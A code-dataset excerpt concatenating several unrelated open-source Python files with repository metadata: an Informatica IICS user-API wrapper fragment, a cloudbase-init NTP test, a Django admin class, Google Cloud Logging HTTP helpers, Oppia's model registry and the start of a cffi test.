url=self._v3BaseURL + "/public/core/v3/users"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + "This API requires no body")
try:
response = re.get(url=url, headers=headers)
infapy.log.debug(str(response.json()))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Fetched the all the user details from IICS")
data = response.json()
infapy.log.info("getAllUsers() called successfully. Processing completed")
return data
def getUserByID(self,id):
"""We can use this method to get the user details of a particular user
Args:
id (string): you can use the user id to get the details
Returns:
json: infaUserDetails
"""
infapy.log.info("getting details of user id " + str(id) + " . Processing request....")
url=self._v3BaseURL + "/public/core/v3/users?q=userId=="+str(id)+"&limit=1&skip=0"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + "This API requires no body")
try:
response = re.get(url=url, headers=headers)
infapy.log.debug(str(response.json()))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Fetched the user details of user id: " + id + " from IICS")
data = response.json()
infapy.log.info("getAllUsers() called successfully. Processing completed")
return data
def createNewUser(self,userProfileInJson):
infapy.log.info("Creating new user..")
infapy.log.info("User Profile provided: " + str(userProfileInJson))
url=self._v3BaseURL + "/public/core/v3/users"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
body = userProfileInJson
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + str(userProfileInJson))
try:
response = re.post(url=url, json=body, headers=headers)
data = response.json()
infapy.log.debug(str(data))
try:
if ("error" in data):
infapy.log.error("please validate the json string and provide a valid json")
infapy.log.error("User Creation failed")
infapy.log.error(str(data))
raise InvalidUserDetailsProvided
except Exception as e:
infapy.log.exception(e)
raise
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Created New User Successfully")
infapy.log.info("createNewUser completed successfully..")
return data
def deleteUser(self,userID):
infapy.log.info("Deleting user id: " + str(userID))
url=self._v3BaseURL + "/public/core/v3/users/" + str(userID)
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("Delete User URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: There are no headers for this request" )
try:
response = re.delete(url=url, headers=headers)
# data = response.json()
infapy.log.debug(str(response))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Delete user successfully")
# infapy.log.info(str(data))
infapy.log.info("deleteUser completed successfully..")
# return data
| 39.268908
| 120
| 0.598117
|
d3f0638c6973bfe494c250cc9a8caaef71e23d21
| 4,647
|
py
|
Python
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 160
|
2015-01-09T14:45:59.000Z
|
2022-03-15T09:15:12.000Z
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 95
|
2015-01-25T15:22:05.000Z
|
2022-03-16T10:40:27.000Z
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 86
|
2015-01-19T17:19:35.000Z
|
2022-03-24T09:21:55.000Z
|
# Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.plugins.windows import ntpclient
CONF = cloudbaseinit_conf.CONF
class NTPClientPluginTests(unittest.TestCase):
def setUp(self):
self._ntpclient = ntpclient.NTPClientPlugin()
def test_set_ntp_trigger_mode(self):
mock_osutils = mock.Mock()
self._ntpclient._set_ntp_trigger_mode(mock_osutils)
args = [
mock.call.execute_system32_process(
["sc.exe", "triggerinfo", ntpclient._W32TIME_SERVICE,
"delete"]),
mock.call.execute_system32_process(
["sc.exe", "triggerinfo", ntpclient._W32TIME_SERVICE,
"start/networkon", "stop/networkoff"])
]
mock_osutils.assert_has_calls(args)
@mock.patch('time.sleep')
@mock.patch('cloudbaseinit.plugins.windows.ntpclient.NTPClientPlugin.'
'_set_ntp_trigger_mode')
def _test_check_w32time_svc_status(self, mock_set_ntp_trigger_mode,
mock_sleep, start_mode,
fail_service_start,
patch_check_os_version=True):
# TODO(rtingirica): use _W32TIME_SERVICE when it will be moved outside
# of method declaration
mock_osutils = mock.MagicMock()
mock_osutils.SERVICE_START_MODE_AUTOMATIC = "Automatic"
mock_osutils.SERVICE_STATUS_RUNNING = "running"
mock_osutils.SERVICE_STATUS_STOPPED = "stopped"
mock_osutils.get_service_start_mode.return_value = start_mode
mock_osutils.check_os_version.return_value = patch_check_os_version
if fail_service_start:
mock_osutils.get_service_status.return_value = "stopped"
self.assertRaises(exception.CloudbaseInitException,
self._ntpclient.verify_time_service,
mock_osutils)
else:
mock_osutils.get_service_status.side_effect = [
"stopped", mock_osutils.SERVICE_STATUS_RUNNING]
self._ntpclient.verify_time_service(osutils=mock_osutils)
if start_mode != mock_osutils.SERVICE_START_MODE_AUTOMATIC:
mock_osutils.set_service_start_mode.assert_called_once_with(
ntpclient._W32TIME_SERVICE,
mock_osutils.SERVICE_START_MODE_AUTOMATIC)
mock_sleep.assert_called_once_with(1)
mock_osutils.start_service.assert_called_once_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.get_service_start_mode.assert_called_once_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.get_service_status.assert_called_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.check_os_version.assert_called_once_with(6, 1)
if patch_check_os_version:
mock_set_ntp_trigger_mode.assert_called_once_with(mock_osutils)
else:
self.assertFalse(mock_set_ntp_trigger_mode.called)
def test_check_w32time_svc_status_other_start_mode(self):
self._test_check_w32time_svc_status(start_mode="not automatic",
fail_service_start=False)
def test_check_w32time_svc_status_start_automatic(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=False)
def test_check_w32time_svc_status_exception(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=True)
def test_check_w32time_older_oses(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=False,
patch_check_os_version=False)
| 41.864865
| 78
| 0.665376
|
1bad382db7605ff8a40525fcd157de8652c15ffd
| 806
|
py
|
Python
|
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | 1
|
2021-07-29T13:36:43.000Z
|
2021-07-29T13:36:43.000Z
|
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | null | null | null |
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.conf import settings
class StateTraceAdmin(admin.ModelAdmin):
change_form_template = "statetrace_django/change_form.html"
def change_view(self, request, object_id, form_url="", extra_context=None):
extra_context = {
**(extra_context or {}),
**{
"staterace_search_base_url": getattr(
settings,
"STATETRACE_SEARCH_URL",
"http://localhost:4000/organizations/1/environments/1/db/1/outbound/1/search",
),
"statetrace_object_pk": object_id,
"statetrace_table_name": self.model._meta.db_table,
},
}
return super().change_view(request, object_id, form_url, extra_context)
| 33.583333
| 98
| 0.600496
|
0838e7fe42acc1d725502c48fdc45727b2676329
| 17,762
|
py
|
Python
|
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | 1
|
2017-05-18T06:58:48.000Z
|
2017-05-18T06:58:48.000Z
|
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | null | null | null |
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | 1
|
2022-03-24T01:37:10.000Z
|
2022-03-24T01:37:10.000Z
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interact with Stackdriver Logging via JSON-over-HTTP."""
import functools
from google.cloud import _http
from google.cloud.iterator import HTTPIterator
from google.cloud.logging import __version__
from google.cloud.logging._helpers import entry_from_resource
from google.cloud.logging.sink import Sink
from google.cloud.logging.metric import Metric
_CLIENT_INFO = _http.CLIENT_INFO_TEMPLATE.format(__version__)
class Connection(_http.JSONConnection):
"""A connection to Google Stackdriver Logging via the JSON REST API.
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client that owns the current connection.
"""
API_BASE_URL = 'https://logging.googleapis.com'
"""The base of the API call URL."""
API_VERSION = 'v2'
"""The version of the API, used in building the API call's URL."""
API_URL_TEMPLATE = '{api_base_url}/{api_version}{path}'
"""A template for the URL of a particular API call."""
_EXTRA_HEADERS = {
_http.CLIENT_INFO_HEADER: _CLIENT_INFO,
}
class _LoggingAPI(object):
"""Helper mapping logging-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.logs
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_entries(self, projects, filter_=None, order_by=None,
page_size=None, page_token=None):
"""Return a page of log entry resources.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/list
:type projects: list of strings
:param projects: project IDs to include. If not passed,
defaults to the project bound to the client.
:type filter_: str
:param filter_:
a filter expression. See:
https://cloud.google.com/logging/docs/view/advanced_filters
:type order_by: str
:param order_by: One of :data:`~google.cloud.logging.ASCENDING`
or :data:`~google.cloud.logging.DESCENDING`.
:type page_size: int
:param page_size: maximum number of entries to return, If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of entries. If not
passed, the API will return the first page of
entries.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of :class:`~google.cloud.logging.entries._BaseEntry`
accessible to the current API.
"""
extra_params = {'projectIds': projects}
if filter_ is not None:
extra_params['filter'] = filter_
if order_by is not None:
extra_params['orderBy'] = order_by
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/entries:list'
# We attach a mutable loggers dictionary so that as Logger
# objects are created by entry_from_resource, they can be
# re-used by other log entries from the same logger.
loggers = {}
item_to_value = functools.partial(
_item_to_entry, loggers=loggers)
iterator = HTTPIterator(
client=self._client, path=path,
item_to_value=item_to_value, items_key='entries',
page_token=page_token, extra_params=extra_params)
# This method uses POST to make a read-only request.
iterator._HTTP_METHOD = 'POST'
return iterator
def write_entries(self, entries, logger_name=None, resource=None,
labels=None):
"""API call: log an entry resource via a POST request
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/write
:type entries: sequence of mapping
:param entries: the log entry resources to log.
:type logger_name: str
:param logger_name: name of default logger to which to log the entries;
individual entries may override.
:type resource: mapping
:param resource: default resource to associate with entries;
individual entries may override.
:type labels: mapping
:param labels: default labels to associate with entries;
individual entries may override.
"""
data = {'entries': list(entries)}
if logger_name is not None:
data['logName'] = logger_name
if resource is not None:
data['resource'] = resource
if labels is not None:
data['labels'] = labels
self.api_request(method='POST', path='/entries:write', data=data)
def logger_delete(self, project, logger_name):
"""API call: delete all entries in a logger via a DELETE request
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.logs/delete
:type project: str
:param project: ID of project containing the log entries to delete
:type logger_name: str
:param logger_name: name of logger containing the log entries to delete
"""
path = '/projects/%s/logs/%s' % (project, logger_name)
self.api_request(method='DELETE', path=path)
class _SinksAPI(object):
"""Helper mapping sink-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_sinks(self, project, page_size=None, page_token=None):
"""List sinks for the project associated with this client.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/list
:type project: str
:param project: ID of the project whose sinks are to be listed.
:type page_size: int
:param page_size: maximum number of sinks to return, If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of sinks. If not
passed, the API will return the first page of
sinks.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of
:class:`~google.cloud.logging.sink.Sink`
accessible to the current API.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/projects/%s/sinks' % (project,)
return HTTPIterator(
client=self._client, path=path,
item_to_value=_item_to_sink, items_key='sinks',
page_token=page_token, extra_params=extra_params)
def sink_create(self, project, sink_name, filter_, destination):
"""API call: create a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/create
:type project: str
:param project: ID of the project in which to create the sink.
:type sink_name: str
:param sink_name: the name of the sink
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the sink.
:type destination: str
:param destination: destination URI for the entries exported by
the sink.
"""
target = '/projects/%s/sinks' % (project,)
data = {
'name': sink_name,
'filter': filter_,
'destination': destination,
}
self.api_request(method='POST', path=target, data=data)
def sink_get(self, project, sink_name):
"""API call: retrieve a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/get
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
:rtype: dict
:returns: The JSON sink object returned from the API.
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
return self.api_request(method='GET', path=target)
def sink_update(self, project, sink_name, filter_, destination):
"""API call: update a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/update
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the sink.
:type destination: str
:param destination: destination URI for the entries exported by
the sink.
:rtype: dict
:returns: The returned (updated) resource.
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
data = {
'name': sink_name,
'filter': filter_,
'destination': destination,
}
return self.api_request(method='PUT', path=target, data=data)
def sink_delete(self, project, sink_name):
"""API call: delete a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/delete
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
self.api_request(method='DELETE', path=target)
class _MetricsAPI(object):
"""Helper mapping sink-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_metrics(self, project, page_size=None, page_token=None):
"""List metrics for the project associated with this client.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/list
:type project: str
:param project: ID of the project whose metrics are to be listed.
:type page_size: int
:param page_size: maximum number of metrics to return, If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of metrics. If not
passed, the API will return the first page of
metrics.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of
:class:`~google.cloud.logging.metric.Metric`
accessible to the current API.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/projects/%s/metrics' % (project,)
return HTTPIterator(
client=self._client, path=path,
item_to_value=_item_to_metric, items_key='metrics',
page_token=page_token, extra_params=extra_params)
def metric_create(self, project, metric_name, filter_, description=None):
"""API call: create a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/create
:type project: str
:param project: ID of the project in which to create the metric.
:type metric_name: str
:param metric_name: the name of the metric
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the metric.
:type description: str
:param description: description of the metric.
"""
target = '/projects/%s/metrics' % (project,)
data = {
'name': metric_name,
'filter': filter_,
'description': description,
}
self.api_request(method='POST', path=target, data=data)
def metric_get(self, project, metric_name):
"""API call: retrieve a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/get
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric
:rtype: dict
:returns: The JSON metric object returned from the API.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
return self.api_request(method='GET', path=target)
def metric_update(self, project, metric_name, filter_, description):
"""API call: update a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/update
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the metric.
:type description: str
:param description: description of the metric.
:rtype: dict
:returns: The returned (updated) resource.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
data = {
'name': metric_name,
'filter': filter_,
'description': description,
}
return self.api_request(method='PUT', path=target, data=data)
def metric_delete(self, project, metric_name):
"""API call: delete a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/delete
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
self.api_request(method='DELETE', path=target)
def _item_to_entry(iterator, resource, loggers):
"""Convert a log entry resource to the native object.
.. note::
This method does not have the correct signature to be used as
the ``item_to_value`` argument to
:class:`~google.cloud.iterator.Iterator`. It is intended to be
patched with a mutable ``loggers`` argument that can be updated
on subsequent calls. For an example, see how the method is
used above in :meth:`_LoggingAPI.list_entries`.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Log entry JSON resource returned from the API.
:type loggers: dict
:param loggers:
A mapping of logger fullnames -> loggers. If the logger
that owns the entry is not in ``loggers``, the entry
will have a newly-created logger.
:rtype: :class:`~google.cloud.logging.entries._BaseEntry`
:returns: The next log entry in the page.
"""
return entry_from_resource(resource, iterator.client, loggers)
def _item_to_sink(iterator, resource):
"""Convert a sink resource to the native object.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Sink JSON resource returned from the API.
:rtype: :class:`~google.cloud.logging.sink.Sink`
:returns: The next sink in the page.
"""
return Sink.from_api_repr(resource, iterator.client)
def _item_to_metric(iterator, resource):
"""Convert a metric resource to the native object.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Metric JSON resource returned from the API.
:rtype: :class:`~google.cloud.logging.metric.Metric`
:returns: The next metric in the page.
"""
return Metric.from_api_repr(resource, iterator.client)
| 34.623782
| 90
| 0.631517
|
7b2d5fb3b1438ad07ed7138f6df36b16b805f2a3
| 12,087
|
py
|
Python
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | 1
|
2019-05-30T18:08:37.000Z
|
2019-05-30T18:08:37.000Z
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | 7
|
2019-08-20T08:30:43.000Z
|
2022-02-12T18:47:57.000Z
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for storage model switching."""
import feconf
import utils
# Valid model names.
NAMES = utils.create_enum(
'activity', 'audit', 'base_model', 'classifier', 'collection', 'config',
'email', 'exploration', 'feedback', 'file', 'job', 'question',
'recommendations', 'skill', 'statistics', 'story', 'suggestion', 'topic',
'user')
GAE_PLATFORM = 'gae'
class Platform(object):
"""A base class for platform-specific imports related to GAE."""
@classmethod
def import_models(cls):
"""An abstract method that should be implemented on inherited
classes.
Raises:
NotImplementedError: The method is not overwritten in derived
classes.
"""
raise NotImplementedError
class _Gae(Platform):
"""Provides platform-specific imports related to
GAE (Google App Engine).
"""
@classmethod
def import_models(cls, model_names):
"""Imports and returns the storage modules listed in model_names.
Args:
model_names: list(str). List of storage module names.
Returns:
tuple(module): Tuple of storage modules.
Raises:
Exception: Invalid model name.
"""
returned_models = []
for name in model_names:
if name == NAMES.activity:
from core.storage.activity import gae_models as activity_models
returned_models.append(activity_models)
elif name == NAMES.audit:
from core.storage.audit import gae_models as audit_models
returned_models.append(audit_models)
elif name == NAMES.base_model:
from core.storage.base_model import gae_models as base_models
returned_models.append(base_models)
elif name == NAMES.classifier:
from core.storage.classifier import gae_models as classifier_data_models # pylint: disable=line-too-long
returned_models.append(classifier_data_models)
elif name == NAMES.collection:
from core.storage.collection import gae_models as collection_models # pylint: disable=line-too-long
returned_models.append(collection_models)
elif name == NAMES.config:
from core.storage.config import gae_models as config_models
returned_models.append(config_models)
elif name == NAMES.email:
from core.storage.email import gae_models as email_models
returned_models.append(email_models)
elif name == NAMES.exploration:
from core.storage.exploration import gae_models as exp_models
returned_models.append(exp_models)
elif name == NAMES.feedback:
from core.storage.feedback import gae_models as feedback_models
returned_models.append(feedback_models)
elif name == NAMES.file:
from core.storage.file import gae_models as file_models
returned_models.append(file_models)
elif name == NAMES.job:
from core.storage.job import gae_models as job_models
returned_models.append(job_models)
elif name == NAMES.question:
from core.storage.question import gae_models as question_models
returned_models.append(question_models)
elif name == NAMES.recommendations:
from core.storage.recommendations import gae_models as recommendations_models # pylint: disable=line-too-long
returned_models.append(recommendations_models)
elif name == NAMES.skill:
from core.storage.skill import gae_models as skill_models
returned_models.append(skill_models)
elif name == NAMES.statistics:
from core.storage.statistics import gae_models as statistics_models # pylint: disable=line-too-long
returned_models.append(statistics_models)
elif name == NAMES.story:
from core.storage.story import gae_models as story_models
returned_models.append(story_models)
elif name == NAMES.suggestion:
from core.storage.suggestion import gae_models as suggestion_models # pylint: disable=line-too-long
returned_models.append(suggestion_models)
elif name == NAMES.topic:
from core.storage.topic import gae_models as topic_models
returned_models.append(topic_models)
elif name == NAMES.user:
from core.storage.user import gae_models as user_models
returned_models.append(user_models)
else:
raise Exception('Invalid model name: %s' % name)
return tuple(returned_models)
@classmethod
def import_transaction_services(cls):
"""Imports and returns gae_transaction_services module.
Returns:
module. The gae_transaction_services module.
"""
from core.platform.transactions import gae_transaction_services
return gae_transaction_services
@classmethod
def import_current_user_services(cls):
"""Imports and returns gae_current_user_services module.
Returns:
module. The gae_current_user_services module.
"""
from core.platform.users import gae_current_user_services
return gae_current_user_services
@classmethod
def import_datastore_services(cls):
"""Imports and returns gae_datastore_services module.
Returns:
module. The gae_datastore_services module.
"""
from core.platform.datastore import gae_datastore_services
return gae_datastore_services
@classmethod
def import_app_identity_services(cls):
"""Imports and returns gae_app_identity_services module.
Returns:
module. The gae_app_identity_services module.
"""
from core.platform.app_identity import gae_app_identity_services
return gae_app_identity_services
@classmethod
def import_gae_image_services(cls):
"""Imports and returns gae_image_services module.
Returns:
module. The gae_image_services module.
"""
from core.platform.image import gae_image_services
return gae_image_services
@classmethod
def import_email_services(cls):
"""Imports and returns the email services module specified in feconf.py.
Returns:
module. The email_services module to use, based on the feconf.py
setting.
Raises:
Exception: feconf.EMAIL_SERVICE_PROVIDER does not correspond
to a valid email_services module.
"""
if feconf.EMAIL_SERVICE_PROVIDER == feconf.EMAIL_SERVICE_PROVIDER_GAE:
from core.platform.email import gae_email_services
return gae_email_services
elif (feconf.EMAIL_SERVICE_PROVIDER ==
feconf.EMAIL_SERVICE_PROVIDER_MAILGUN):
from core.platform.email import mailgun_email_services
return mailgun_email_services
else:
raise Exception(
('Invalid email service provider: %s'
% feconf.EMAIL_SERVICE_PROVIDER))
@classmethod
def import_memcache_services(cls):
"""Imports and returns gae_memcache_services.
Returns:
module. The gae_memcache_services module.
"""
from core.platform.memcache import gae_memcache_services
return gae_memcache_services
@classmethod
def import_taskqueue_services(cls):
"""Imports and returns gae_taskqueue_services module.
Returns:
module. The gae_taskqueue_services module.
"""
from core.platform.taskqueue import gae_taskqueue_services
return gae_taskqueue_services
@classmethod
def import_search_services(cls):
"""Imports and returns gae_search_services module.
Returns:
module. The gae_search_services module.
"""
from core.platform.search import gae_search_services
return gae_search_services
NAME = 'gae'
class Registry(object):
"""Platform-agnostic interface for retrieving platform-specific
modules.
"""
# Maps platform names to the corresponding module registry classes.
_PLATFORM_MAPPING = {
_Gae.NAME: _Gae,
}
@classmethod
def _get(cls):
"""Returns the appropriate interface class for platform-specific
imports.
Returns:
class: The corresponding platform-specific interface class.
"""
return cls._PLATFORM_MAPPING.get(GAE_PLATFORM)
@classmethod
def import_models(cls, model_names):
"""Imports and returns the storage modules listed in model_names.
Args:
model_names: list(str). List of storage module names.
Returns:
list(module). The corresponding storage-layer modules.
"""
return cls._get().import_models(model_names)
@classmethod
def import_current_user_services(cls):
"""Imports and returns current_user_services module.
Returns:
module. The current_user_services module.
"""
return cls._get().import_current_user_services()
@classmethod
def import_datastore_services(cls):
"""Imports and returns datastore_services module.
Returns:
module. The datastore_services module.
"""
return cls._get().import_datastore_services()
@classmethod
def import_transaction_services(cls):
"""Imports and returns transaction_services module.
Returns:
module. The transaction_services module.
"""
return cls._get().import_transaction_services()
@classmethod
def import_app_identity_services(cls):
"""Imports and returns app_identity_services module.
Returns:
module. The app_identity_services module.
"""
return cls._get().import_app_identity_services()
@classmethod
def import_gae_image_services(cls):
"""Imports and returns gae_image_services module.
Returns:
module. The gae_image_services module.
"""
return cls._get().import_gae_image_services()
@classmethod
def import_email_services(cls):
"""Imports and returns email_services module.
Returns:
module. The email_services module.
"""
return cls._get().import_email_services()
@classmethod
def import_memcache_services(cls):
"""Imports and returns memcache_services module.
Returns:
module. The memcache_services module.
"""
return cls._get().import_memcache_services()
@classmethod
def import_taskqueue_services(cls):
"""Imports and returns taskqueue_services module.
Returns:
module. The taskqueue_services module.
"""
return cls._get().import_taskqueue_services()
@classmethod
def import_search_services(cls):
"""Imports and returns search_services module.
Returns:
module. The search_services module.
"""
return cls._get().import_search_services()
| 34.732759
| 125
| 0.651526
|
02b15b14a927d4c9e6ce24934e01000c7d8632a6
| 15,467
|
py
|
Python
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 333
|
2015-08-08T18:03:38.000Z
|
2022-03-22T18:13:12.000Z
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 7
|
2020-02-16T16:49:05.000Z
|
2021-11-26T09:00:56.000Z
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
# Generated by pypy/tool/import_cffi.py
import sys, re, os, py
import cffi
from cffi import cffi_opcode
if '__pypy__' in sys.builtin_module_names:
try:
# pytest >= 4.0
py.test.skip("not available on pypy", allow_module_level=True)
except TypeError:
# older pytest
py.test.skip("not available on pypy")
cffi_dir = os.path.dirname(cffi_opcode.__file__)
r_macro = re.compile(r"#define \w+[(][^\n]*|#include [^\n]*")
r_define = re.compile(r"(#define \w+) [^\n]*")
r_ifdefs = re.compile(r"(#ifdef |#endif)[^\n]*")
header = open(os.path.join(cffi_dir, 'parse_c_type.h')).read()
header = r_macro.sub(r"", header)
header = r_define.sub(r"\1 ...", header)
header = r_ifdefs.sub(r"", header)
ffi = cffi.FFI()
ffi.cdef(header)
lib = ffi.verify(
open(os.path.join(cffi_dir, '..', 'c', 'parse_c_type.c')).read() + """
static const char *get_common_type(const char *search, size_t search_len) {
return NULL;
}
""", include_dirs=[cffi_dir])
class ParseError(Exception):
pass
struct_names = ["bar_s", "foo", "foo_", "foo_s", "foo_s1", "foo_s12"]
